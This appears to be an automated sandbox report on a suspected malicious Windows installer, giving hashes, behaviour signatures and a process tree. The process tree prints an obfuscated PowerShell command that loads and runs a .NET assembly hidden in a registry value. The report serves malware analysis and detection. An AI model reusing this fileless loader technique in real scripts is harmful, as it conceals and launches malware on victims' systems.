Analysis

  • max time kernel
    117s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
  • submitted
    01/07/2024, 18:28

General

  • Target

    zvgfd-main/Install.exe

  • Size

    164KB

  • MD5

    319a41dd1934848abc8a5df381540481

  • SHA1

    24ad88753d62ae5e38c3b6caba45bef5c70f7699

  • SHA256

    abde8270375bf984b9a8bf1c15ff77f9e33ad185c7305471e05feb80843ee5bc

  • SHA512

    929ca873880db0706ab3d76d98acd343dafab2145fafa3aa05c273b3cf451aac16d1ce71776a9e1fde7a794f172d60dc1536876193bd510de8a259c3f43211cf

  • SSDEEP

    3072:xQpsM8ulc/LGjoOYDqFPgdt3oJ4xbnaldp9pq1N1dIfnXSxmPRnSee9:xQpsMjlc/LGMAFet30Kbml41N1dINP4p

Score
5/10

Malware Config

Signatures

  • Drops file in System32 directory 1 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Install.exe
    "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Install.exe"
    1⤵
      PID:2384
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {A427E0E1-FCF8-45D4-8FAD-B741CF7CAF75} S-1-5-18:NT AUTHORITY\System:Service:
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:2068
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+'T'+''+'W'+'ARE').GetValue(''+[Char](36)+'77'+[Char](115)+''+'t'+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
        2⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2340

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2340-0-0x000007FEF57FE000-0x000007FEF57FF000-memory.dmp

      Filesize

      4KB

    • memory/2340-1-0x000000001A060000-0x000000001A342000-memory.dmp

      Filesize

      2.9MB

    • memory/2340-4-0x000007FEF5540000-0x000007FEF5EDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2340-3-0x000007FEF5540000-0x000007FEF5EDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2340-2-0x00000000009E0000-0x00000000009E8000-memory.dmp

      Filesize

      32KB

    • memory/2340-5-0x000007FEF5540000-0x000007FEF5EDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2340-6-0x000007FEF5540000-0x000007FEF5EDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2340-7-0x00000000015B0000-0x00000000015DA000-memory.dmp

      Filesize

      168KB

    • memory/2340-8-0x000007FEF5540000-0x000007FEF5EDD000-memory.dmp

      Filesize

      9.6MB